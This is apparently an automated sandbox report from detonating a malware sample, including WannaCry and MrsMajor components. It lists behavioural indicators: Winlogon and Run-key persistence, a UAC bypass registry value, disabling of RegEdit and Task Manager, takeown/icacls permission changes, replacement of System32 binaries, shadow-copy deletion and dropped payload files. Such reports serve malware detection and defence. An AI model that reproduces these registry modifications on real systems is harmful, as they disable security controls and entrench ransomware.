Analysis Overview
Threat Level: Known bad
The file http://github.com was found to be: Known bad.
Malicious Activity Summary
Modifies WinLogon for persistence
Suspicious use of NtCreateProcessExOtherParentProcess
Detected microsoft outlook phishing page
UAC bypass
Wannacry
Deletes shadow copies
Possible privilege escalation attempt
Downloads MZ/PE file
Disables RegEdit via registry modification
Disables Task Manager via registry modification
Checks computer location settings
Modifies file permissions
Obfuscated with Agile.Net obfuscator
Reads user/profile data of web browsers
Modifies system executable filetype association
Loads dropped DLL
Executes dropped EXE
Drops startup file
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Drops file in System32 directory
Sets desktop wallpaper using registry
Drops file in Program Files directory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Views/modifies file attributes
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks processor information in registry
Modifies registry class
System policy modification
Uses Volume Shadow Copy service COM API
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Modifies data under HKEY_USERS
Enumerates system info in registry
Modifies Control Panel
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
NTFS ADS
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Modifies registry key
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-10-07 11:35
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-07 11:35
Reported
2024-10-07 12:11
Platform
win10v2004-20241007-en
Max time kernel
2131s
Max time network
2134s
Command Line
Signatures
Detected microsoft outlook phishing page
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\Program Files\\MicrosoftWindowsServicesEtc\\xRunReg.vbs\"" | C:\Windows\system32\wscript.exe | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1632 created 4352 | N/A | C:\Windows\system32\taskmgr.exe | C:\Users\Admin\Desktop\@[email protected] |
| PID 1632 created 4352 | N/A | C:\Windows\system32\taskmgr.exe | C:\Users\Admin\Desktop\@[email protected] |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
Wannacry
Deletes shadow copies
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\disableregistrytools = "1" | C:\Windows\system32\wscript.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MrsMajor3.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-13.5.6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MrsMajor2.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\MicrosoftWindowsServicesEtc\GetReady.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MrsMajor3.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MrsMajor3.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MrsMajor3.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\rundll32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MrsMajor3.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD37C8.tmp | C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD37B1.tmp | C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Program Files\\MicrosoftWindowsServicesEtc\\data\\fileico.ico" | C:\Windows\system32\wscript.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\nzfbkoaczl750 = "\"C:\\Users\\Admin\\Desktop\\tasksche.exe\"" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MajorX = "wscript.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\xRun.vbs\"" | C:\Windows\system32\wscript.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\taskmgr.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\System32\taskmgr.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\sethc.exe | C:\Windows\system32\cmd.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\program files\MicrosoftWindowsServicesEtc\weird\majorlist.bat | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\AppKill.bat | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\data\excursor.ani | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\data\thetruth.jpg | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\weird\cmd.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\fexec.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\RuntimeChecker.exe | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\breakrule.exe | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\Major.exe | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\weird\majorsod.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\weird\WinScrew.bat | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\weird\breakrule.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\weird\GetReady.bat | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\weird\RuntimeChecker.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\xRun.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\bsod.exe | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\data\runner32s.exe | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\GetReady.exe | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\NotMuch.exe | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\healgen.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\rsod.exe | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\xRunReg.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\weird\Major.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\WinScrew.exe | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\CallFunc.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\data\fileico.ico | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\DgzRun.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\majorlist.exe | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\majordared.exe | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\weird\runner32s.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\example.txt | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\majorsod.exe | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\weird\bsod.bat | C:\Windows\system32\wscript.exe | N/A |
| File opened for modification | C:\program files\MicrosoftWindowsServicesEtc\AppKill.bat | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\checker.bat | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\clingclang.wav | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\program files\MicrosoftWindowsServicesEtc\data\eula32.exe | C:\Windows\system32\wscript.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\MicrosoftWindowsServicesEtc\notmuch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\sdiagnhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\sdiagnhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\sdiagnhost.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\System32\sdiagnhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\sdiagnhost.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
